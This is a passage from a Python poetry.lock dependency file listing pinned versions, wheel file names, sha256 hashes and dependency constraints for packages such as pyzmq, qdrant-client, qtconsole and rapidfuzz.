"sha256:87e34f31ca8f168c56d6fbf99692cc8d3b445abb5bfd08c229ae992d7547a92a"}, {file = "pyzmq-25.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c9c6c9b2c2f80747a98f34ef491c4d7b1a8d4853937bb1492774992a120f475d"}, {file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:5619f3f5a4db5dbb572b095ea3cb5cc035335159d9da950830c9c4db2fbb6995"}, {file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:5a34d2395073ef862b4032343cf0c32a712f3ab49d7ec4f42c9661e0294d106f"}, {file = "pyzmq-25.1.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:25f0e6b78220aba09815cd1f3a32b9c7cb3e02cb846d1cfc526b6595f6046618"}, {file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3669cf8ee3520c2f13b2e0351c41fea919852b220988d2049249db10046a7afb"}, {file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:2d163a18819277e49911f7461567bda923461c50b19d169a062536fffe7cd9d2"}, {file = "pyzmq-25.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:df27ffddff4190667d40de7beba4a950b5ce78fe28a7dcc41d6f8a700a80a3c0"}, {file = "pyzmq-25.1.1-cp38-cp38-win32.whl", hash = "sha256:a382372898a07479bd34bda781008e4a954ed8750f17891e794521c3e21c2e1c"}, {file = "pyzmq-25.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:52533489f28d62eb1258a965f2aba28a82aa747202c8fa5a1c7a43b5db0e85c1"}, {file = "pyzmq-25.1.1-cp39-cp39-macosx_10_15_universal2.whl", hash = "sha256:03b3f49b57264909aacd0741892f2aecf2f51fb053e7d8ac6767f6c700832f45"}, {file = "pyzmq-25.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:330f9e188d0d89080cde66dc7470f57d1926ff2fb5576227f14d5be7ab30b9fa"}, {file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:2ca57a5be0389f2a65e6d3bb2962a971688cbdd30b4c0bd188c99e39c234f414"}, {file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d457aed310f2670f59cc5b57dcfced452aeeed77f9da2b9763616bd57e4dbaae"}, {file = "pyzmq-25.1.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c56d748ea50215abef7030c72b60dd723ed5b5c7e65e7bc2504e77843631c1a6"}, {file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:8f03d3f0d01cb5a018debeb412441996a517b11c5c17ab2001aa0597c6d6882c"}, {file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:820c4a08195a681252f46926de10e29b6bbf3e17b30037bd4250d72dd3ddaab8"}, {file = "pyzmq-25.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:17ef5f01d25b67ca8f98120d5fa1d21efe9611604e8eb03a5147360f517dd1e2"}, {file = "pyzmq-25.1.1-cp39-cp39-win32.whl", hash = "sha256:04ccbed567171579ec2cebb9c8a3e30801723c575601f9a990ab25bcac6b51e2"}, {file = "pyzmq-25.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:e61f091c3ba0c3578411ef505992d356a812fb200643eab27f4f70eed34a29ef"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:ade6d25bb29c4555d718ac6d1443a7386595528c33d6b133b258f65f963bb0f6"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e0c95ddd4f6e9fca4e9e3afaa4f9df8552f0ba5d1004e89ef0a68e1f1f9807c7"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:48e466162a24daf86f6b5ca72444d2bf39a5e58da5f96370078be67c67adc978"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:abc719161780932c4e11aaebb203be3d6acc6b38d2f26c0f523b5b59d2fc1996"}, {file = "pyzmq-25.1.1-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:1ccf825981640b8c34ae54231b7ed00271822ea1c6d8ba1090ebd4943759abf5"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c2f20ce161ebdb0091a10c9ca0372e023ce24980d0e1f810f519da6f79c60800"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:deee9ca4727f53464daf089536e68b13e6104e84a37820a88b0a057b97bba2d2"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:aa8d6cdc8b8aa19ceb319aaa2b660cdaccc533ec477eeb1309e2a291eaacc43a"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:019e59ef5c5256a2c7378f2fb8560fc2a9ff1d315755204295b2eab96b254d0a"}, {file = "pyzmq-25.1.1-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:b9af3757495c1ee3b5c4e945c1df7be95562277c6e5bccc20a39aec50f826cd0"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:548d6482dc8aadbe7e79d1b5806585c8120bafa1ef841167bc9090522b610fa6"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:057e824b2aae50accc0f9a0570998adc021b372478a921506fddd6c02e60308e"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:2243700cc5548cff20963f0ca92d3e5e436394375ab8a354bbea2b12911b20b0"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79986f3b4af059777111409ee517da24a529bdbd46da578b33f25580adcff728"}, {file = "pyzmq-25.1.1-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:11d58723d44d6ed4dd677c5615b2ffb19d5c426636345567d6af82be4dff8a55"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:49d238cf4b69652257db66d0c623cd3e09b5d2e9576b56bc067a396133a00d4a"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fedbdc753827cf014c01dbbee9c3be17e5a208dcd1bf8641ce2cd29580d1f0d4"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bc16ac425cc927d0a57d242589f87ee093884ea4804c05a13834d07c20db203c"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11c1d2aed9079c6b0c9550a7257a836b4a637feb334904610f06d70eb44c56d2"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:e8a701123029cc240cea61dd2d16ad57cab4691804143ce80ecd9286b464d180"}, {file = "pyzmq-25.1.1-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:61706a6b6c24bdece85ff177fec393545a3191eeda35b07aaa1458a027ad1304"}, {file = "pyzmq-25.1.1.tar.gz", hash = "sha256:259c22485b71abacdfa8bf79720cd7bcf4b9d128b30ea554f01ae71fdbfdaa23"}, ] [package.dependencies] cffi = {version = "*", markers = "implementation_name == \"pypy\""} [[package]] name = "qdrant-client" version = "1.6.4" description = "Client library for the Qdrant vector search engine" optional = true python-versions = ">=3.8,<3.13" files = [ {file = "qdrant_client-1.6.4-py3-none-any.whl", hash = "sha256:db4696978d6a62d78ff60f70b912383f1e467bda3053f732b01ddb5f93281b10"}, {file = "qdrant_client-1.6.4.tar.gz", hash = "sha256:bbd65f383b6a55a9ccf4e301250fa925179340dd90cfde9b93ce4230fd68867b"}, ] [package.dependencies] grpcio = ">=1.41.0" grpcio-tools = ">=1.41.0" httpx = {version = ">=0.14.0", extras = ["http2"]} numpy = {version = ">=1.21", markers = "python_version >= \"3.8\" and python_version < \"3.12\""} portalocker = ">=2.7.0,<3.0.0" pydantic = ">=1.10.8" urllib3 = ">=1.26.14,<2.0.0" [package.extras] fastembed = ["fastembed (==0.1.1)"] [[package]] name = "qtconsole" version = "5.4.4" description = "Jupyter Qt console" optional = false python-versions = ">= 3.7" files = [ {file = "qtconsole-5.4.4-py3-none-any.whl", hash = "sha256:a3b69b868e041c2c698bdc75b0602f42e130ffb256d6efa48f9aa756c97672aa"}, {file = "qtconsole-5.4.4.tar.gz", hash = "sha256:b7ffb53d74f23cee29f4cdb55dd6fabc8ec312d94f3c46ba38e1dde458693dfb"}, ] [package.dependencies] ipykernel = ">=4.1" ipython-genutils = "*" jupyter-client = ">=4.1" jupyter-core = "*" packaging = "*" pygments = "*" pyzmq = ">=17.1" qtpy = ">=2.4.0" traitlets = "<5.2.1 || >5.2.1,<5.2.2 || >5.2.2" [package.extras] doc = ["Sphinx (>=1.3)"] test = ["flaky", "pytest", "pytest-qt"] [[package]] name = "qtpy" version = "2.4.1" description = "Provides an abstraction layer on top of the various Qt bindings (PyQt5/6 and PySide2/6)." optional = false python-versions = ">=3.7" files = [ {file = "QtPy-2.4.1-py3-none-any.whl", hash = "sha256:1c1d8c4fa2c884ae742b069151b0abe15b3f70491f3972698c683b8e38de839b"}, {file = "QtPy-2.4.1.tar.gz", hash = "sha256:a5a15ffd519550a1361bdc56ffc07fda56a6af7292f17c7b395d4083af632987"}, ] [package.dependencies] packaging = "*" [package.extras] test = ["pytest (>=6,!=7.0.0,!=7.0.1)", "pytest-cov (>=3.0.0)", "pytest-qt"] [[package]] name = "rank-bm25" version = "0.2.2" description = "Various BM25 algorithms for document ranking" optional = true python-versions = "*" files = [ {file = "rank_bm25-0.2.2-py3-none-any.whl", hash = "sha256:7bd4a95571adadfc271746fa146a4bcfd89c0cf731e49c3d1ad863290adbe8ae"}, {file = "rank_bm25-0.2.2.tar.gz", hash = "sha256:096ccef76f8188563419aaf384a02f0ea459503fdf77901378d4fd9d87e5e51d"}, ] [package.dependencies] numpy = "*" [package.extras] dev = ["pytest"] [[package]] name = "rapidfuzz" version = "3.4.0" description = "rapid fuzzy string matching" optional = true python-versions = ">=3.7" files = [ {file = "rapidfuzz-3.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:1438e68fe8869fe6819a313140e98641b34bfc89234b82486d8fd02044a067e8"}, {file = "rapidfuzz-3.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:59f851c7a54a9652b9598553547e0940244bfce7c9b672bac728efa0b9028d03"}, {file = "rapidfuzz-3.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6286510910fcd649471a7f5b77fcc971e673729e7c84216dbf321bead580d5a1"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87409e12f9a82aa33a5b845c49dd8d5d4264f2f171f0a69ddc638e100fcc50de"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d1d81d380ceabc8297880525c9d8b9e93fead38d3d2254e558c36c18aaf2553f"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a716efcfc92659d8695291f07da4fa60f42a131dc4ceab583931452dd5662e92"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:83387fb81c4c0234b199110655779762dd5982cdf9de4f7c321110713193133e"}, {file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:55efb3231bb954f3597313ebdf104289b8d139d5429ad517051855f84e12b94e"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:51d47d52c890cbdb2d8b2085d747e557f15efd9c990cb6ae624c8f6948c4aa3a"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3db79070888d0dcd4f6a20fd30b8184dd975d6b0f7818acff5d7e07eba19b71f"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:46efc5e4675e2bd5118427513f86eaf3689e1482ebd309ad4532bcefae78179d"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:d15c364c5aa8f032dadf5b82fa02b7a4bd9688a961a27961cd5b985203f58037"}, {file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f1e91460baa42f5408f3c062913456a24b2fc1a181959b58a9c06b5eef700ca6"}, {file = "rapidfuzz-3.4.0-cp310-cp310-win32.whl", hash = "sha256:c7f4f6dac25c120de8845a65a97090658c8a976827ac22b6b86e2a16a60bb820"}, {file = "rapidfuzz-3.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:124578029d926b2be32d60b748be95ee0de6cb2753eb49d6d1d6146269b428b9"}, {file = "rapidfuzz-3.4.0-cp310-cp310-win_arm64.whl", hash = "sha256:3af0384132e79fe6f6370d49347649382e04f689277525903bef84d30f3992fd"}, {file = "rapidfuzz-3.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:66ff93b81b382269dc7c2d46c839ce72e2d2331ad46a06321770bc94016fe236"}, {file = "rapidfuzz-3.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:da2764604a31fd1e3f1cacf226b43a871cc9f28844a3196c2a6b1ba52ae12922"}, {file = "rapidfuzz-3.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:8eb33895353bfcc33ccf4b4bae837c0afb4eaf20a0361aa6f0800cef12505e91"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ed3da08830c08c8bcd49414cc06b704a760d3067804775facc0df725b52085a4"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b38c7021f6114cfacba5717192fb3e1e50053261d49a774e645021a2f77e20a3"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f7f5ea97886d2ec7b2b9a8172812a76e1d243f2ce705c2f24baf46f9ef5d3951"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5b9a7ab061c1b75b274fc2ebd1d29cfa2e510c36e2f4cd9518a6d56d589003c8"}, {file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:23b07685c21c93cdf6d68b49eccacfe975651b8d99ea8a02687400c60315e5bc"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:c2a564f748497b6a5e08a1dc0ac06655f65377cf072c4f0e2c73818acc655d36"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:ef30b5f2720f0acbcfba0e0661a4cc118621c47cf69b5fe92531dfed1e369e1c"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:ab981f9091ae8bd32bca9289fa1019b4ec656543489e7e13e64882d57d989282"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:a80f9aa4245a49e0677896d1b51b2b3bc36472aff7cec31c4a96f789135f03fe"}, {file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:0d8c6cb80b5d2edf88bf6a88ac6827a353c974405c2d7e3025ed9527a5dbe1a6"}, {file = "rapidfuzz-3.4.0-cp311-cp311-win32.whl", hash = "sha256:c0150d521199277b5ad8bd3b060a5f3c1dbdf11df0533b4d79f458ef11d07e8c"}, {file = "rapidfuzz-3.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:bd50bc90167601963e2a90b820fb862d239ecb096a991bf3ce33ffaa1d6eedee"}, {file = "rapidfuzz-3.4.0-cp311-cp311-win_arm64.whl", hash = "sha256:bd10d68baabb63a3bb36b683f98fc481fcc62230e493e4b31e316bd5b299ef68"}, {file = "rapidfuzz-3.4.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:7f497f850d46c5e08f3340343842a28ede5d3997e5d1cadbd265793cf47417e5"}, {file = "rapidfuzz-3.4.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:a7d6a9f04ea1277add8943d4e144e59215009f54f2668124ff26dee18a875343"}, {file = "rapidfuzz-3.4.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:b6fe2aff0d9b35191701714e05afe08f79eaea376a3a6ca802b72d9e5b48b545"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b81b8bc29114ca861fed23da548a837832b85495b0c1b2600e6060e3cf4d50aa"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:805dc2aa3ac295dcbf2df8c1e420e8a73b1f632d6820a5a1c8506d22c11e0f27"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1276c7f50cd90a48b00084feb25256135c9ace6c599295dd5932949ec30c0e70"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0b9197656a6d71483959bf7d216e7fb7a6b80ca507433bcb3015fb92abc266f8"}, {file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3456f4df5b8800315fd161045c996479016c112228e4da370d09ed80c24853e5"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:734046d557550589edb83d5ad1468a1341d1092f1c64f26fd0b1fc50f9efdce1"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:37d5f0fbad6c092c89840eea2c4c845564d40849785de74c5e6ff48b47b0ecf6"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:bfe14711b9a7b744e242a482c6cabb696517a1a9946fc1e88d353cd3eb384788"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:1a733c10b1fcc47f837c23ab4a255cc4021a88939ff81baa64d6738231cba33d"}, {file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:929e6b71e5b36caee2ee11c209e75a0fcbd716a1b76ae6162b89ee9b591b63b1"}, {file = "rapidfuzz-3.4.0-cp312-cp312-win32.whl", hash = "sha256:c56073ba1d1b25585359ad9769163cb2f3183e7a03c03b914a0667fcbd95dc5c"}, {file = "rapidfuzz-3.4.0-cp312-cp312-win_amd64.whl", hash = "sha256:bf58ba21df06fc8aeef3056fd137eca0a593c2f5c82923a4524d251dc5f3df5d"}, {file = "rapidfuzz-3.4.0-cp312-cp312-win_arm64.whl", hash = "sha256:f3effbe9c677658b3149da0d2778a740a6b7d8190c1407fd0c0770a4e223cfe0"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ed0d5761b44d9dd87278d5c32903bb55632346e4d84ea67ba2e4a84afc3b7d45"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1bafbd3e2e9e0b5f740f66155cc7e1e23eee1e1f2c44eff12daf14f90af0e8ab"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2543fd8d0fb3b1ac065bf94ee54c0ea33343c62481d8e54b6117a88c92c9b721"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:93ceb62ade1a0e62696487274002157a58bb751fc82cd25016fc5523ba558ca5"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:76f4162ce5fe08609455d318936ed4aa709f40784be61fb4e200a378137b0230"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f723197f2dbce508a7030dcf6d3fc940117aa54fc876021bf6f6feeaf3825ba1"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:cfdc74afd93ac71270b5be5c25cb864b733b9ae32b07495705a6ac294ac4c390"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:273c7c7f5b405f2f54d41e805883572d57e1f0a56861f93ca5a6733672088acb"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:712dd91d429afaddbf7e86662155f2ad9bc8135fca5803a01035a3c1d76c5977"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:9814905414696080d8448d6e6df788a0148954ab34d7cd8d75bcb85ba30e0b25"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:01013ee67fb15608c8c5961af3bc2b1f242cff94c19f53237c9b3f0edb8e0a2d"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-win32.whl", hash = "sha256:8f5d2adc48c181486125d42230e80479a1e0568942e883d1ebdeb76cd3f83470"}, {file = "rapidfuzz-3.4.0-cp37-cp37m-win_amd64.whl", hash = "sha256:c92d847c997c384670e3b4cf6727cb73a4d7a7ba6457310e2083cf06d56013c4"}, {file = "rapidfuzz-3.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:d0bda173b0ec1fa546f123088c0d42c9096304771b4c0555d4e08a66a246b3f6"}, {file = "rapidfuzz-3.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:bbb05b1203f683b341f44ebe8fe38afed6e56f606094f9840d6406e4a7bf0eab"}, {file = "rapidfuzz-3.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:f0075ff8990437923da42202b60cf04b5c122ee2856f0cf2344fb890cadecf57"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9f295842c282fe7fe93bfe7a20e78f33f43418f47fb601f2f0a05df8a8282b43"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1ebee7313719dfe652debb74bdd4024e8cf381a59adc6d065520ff927f3445f4"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f71454249ddd29d8ba5415ed7307e7b7493fc7e9018f1ff496127b8b9a8df94b"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:52c6b7a178f0e800488fa1aede17b00f6397cab0b79d48531504b0d89e45315f"}, {file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6d38596c804a9f2bd49360c15e1f4afbf016f181fe37fc4f1a4ddd247d3e91e5"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:8756461e7ee79723b8f762fc6db226e65eb453bf9fa64b14fc0274d4aaaf9e21"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:e14799297f194a4480f373e45142ef16d5dc68a42084c0e2018e0bdba56a8fef"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f813fb663d90038c1171d30ea1b6b275e09fced32f1d12b972c6045d9d4233f2"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:0df66e07e42e2831fae84dea481f7803bec7cfa53c31d770e86ac47bb18dcd57"}, {file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:b05c7d4b4ddb617e977d648689013e50e5688140ee03538d3760a3a11d4fa8a2"}, {file = "rapidfuzz-3.4.0-cp38-cp38-win32.whl", hash = "sha256:74b9a1c1fc139d325fb0b89ccc85527d27096a76f6ed690ee3378143cc38e91d"}, {file = "rapidfuzz-3.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:5fe3ef7daecd79f852936528e37528fd88818bc000991e0fea23b9ac5b79e875"}, {file = "rapidfuzz-3.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:61f16bb0f3026853500e7968261831a2e1a35d56947752bb6cf6953afd70b9de"}, {file = "rapidfuzz-3.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d188e8fb5a9709931c6a48cc62c4ac9b9d163969333711e426d9dbd134c1489b"}, {file = "rapidfuzz-3.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c006aa481d1b91c2600920ce16e42d208a4b6f318d393aef4dd2172d568f2641"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:02afbe7ed12e9191082ed7bda43398baced1d9d805302b7b010d397de3ae973f"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:01d64710060bc3241c08ac1f1a9012c7184f3f4c3d6e2eebb16c6093a03f6a67"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d3198f70b97127e52a4f96bb2f7de447f89baa338ff398eb126930c8e3137ad1"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:50ad7bac98a0f00492687eddda73d2c0bdf71c78b52fddaa5901634ae323d3ce"}, {file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cc3efc06db79e818f4a6783a4e001b3c8b2c61bd05c0d5c4d333adaf64ed1b34"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:75d1365387ec8ef2128fd7e2f7436aa1a04a1953bc6d7068835bb769cd07c146"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:a0750278693525b5ce58d3b313e432dfa5d90f00d06ae54fa8cde87f2a397eb0"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:2e49151572b842d290dcee2cc6f9ce7a7b40b77cc20d0f6d6b54e7afb7bafa5c"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:8b38d7677b2f20b137bb7aaf0dcd3d8ac2a2cde65f09f5621bf3f57d9a1e5d6e"}, {file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d904ac97f2e370f91e8170802669c8ad68641bf84d742968416b53c5960410c6"}, {file = "rapidfuzz-3.4.0-cp39-cp39-win32.whl", hash = "sha256:53bbef345644eac1c2d7cc21ade4fe9554fa289f60eb2c576f7fdc454dbc0641"}, {file = "rapidfuzz-3.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:233bf022938c38060a93863ec548e624d69a56d7384634d8bea435b915b88e52"}, {file = "rapidfuzz-3.4.0-cp39-cp39-win_arm64.whl", hash = "sha256:63933792146f3d333680d415cecc237e6275b42ad948d0a798f9a81325517666"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:e182ea5c809e7ed36ebfbcef4bb1808e213d27b33c036007a33bcbb7ba498356"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9e1142c8d35fa6f3af8150d02ff8edcbea3723c851d889e8b2172e0d1b99f3f7"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6b8258846e56b03230fa733d29bb4f9fb1f4790ac97d1ebe9faa3ff9d2850999"}, {file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:950d1dfd2927cd45c9bb2927933926718f0a17792841e651d42f4d1cb04a5c1d"}, {file = 